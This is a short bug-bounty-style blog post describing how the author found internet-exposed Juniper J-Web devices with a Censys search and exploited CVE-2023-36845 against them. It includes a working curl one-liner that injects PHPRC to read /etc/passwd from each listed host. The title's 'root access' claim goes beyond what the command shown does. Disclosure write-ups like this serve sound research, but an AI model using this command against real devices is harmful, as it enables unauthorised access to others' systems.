How I exploited CVE-2023–36845 and got root access in one domain.

Prince Roy(RoyzSec)
3 min readSep 29, 2023

--

Har Har Mahadev! Hey, this is Prince roy, a cyber security researcher. Recently, CVE-2023–36845 has been published which allows attackers to gain root access to the victim domain.

Description: A PHP External Variable Modification vulnerability in J-Web of Juniper Networks Junos OS on EX Series and SRX Series allows an unauthenticated, network-based attacker to remotely execute code. Using a crafted request which sets the variable PHPRC an attacker is able to modify the PHP execution environment allowing the injection und execution of code. This issue affects Juniper Networks Junos OS on EX Series and SRX Series: * All versions prior to 20.4R3-S9; * 21.1 versions 21.1R1 and later; * 21.2 versions prior to 21.2R3-S7; * 21.3 versions prior to 21.3R3-S5; * 21.4 versions prior to 21.4R3-S5; * 22.1 versions prior to 22.1R3-S4; * 22.2 versions prior to 22.2R3-S2; * 22.3 versions prior to 22.3R2-S2, 22.3R3-S1; * 22.4 versions prior to 22.4R2-S1, 22.4R3; * 23.2 versions prior to 23.2R1-S1, 23.2R2. According to https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-36845

And I successfully gained root access to one product of Vodafone Netherlands. But due to their policy, can’t disclose their details. However, I going to tell you how to exploit this vulnerability.

Okay, guys! As usual, I use https://search.censys.io/ to search for the IP address. This time I also used census and I put this dork:

"Juniper Web Device Manager"

Then found a lot of IP addresses and one of them was the product of Vodafone. After that, I opened the IP address and found this.

Luckily I found a post by Rohit Gautam sir, where he posted the one-line command. According to his post, I saved that IP address in the file.txt and ran that

cat file.txt| while read host do;do curl -sk "http://$host/?PHPRC=/dev/fd/0" -X POST -d 'auto_prepend_file="/etc/passwd"'| grep -i 'root:' && echo "This is VULN";done

And Guess what !! the output was

I was like

Immediately I reported this issue to them within one hour they accepted my report. Finally, I want to thank my mentor Aditya Shende sir for his support. Thank you, guys for reading this small blog of mine.

Please follow my Social media accounts for further updates:

Linkedin: https://www.linkedin.com/in/prince-roy-4b9a75187/

Twitter: https://twitter.com/royzsec

Github: https://github.com/royzsec

--

--

Prince Roy(RoyzSec)
Prince Roy(RoyzSec)

Written by Prince Roy(RoyzSec)

Cyber Security Researcher | Ex-GPCSSI2021

Responses (3)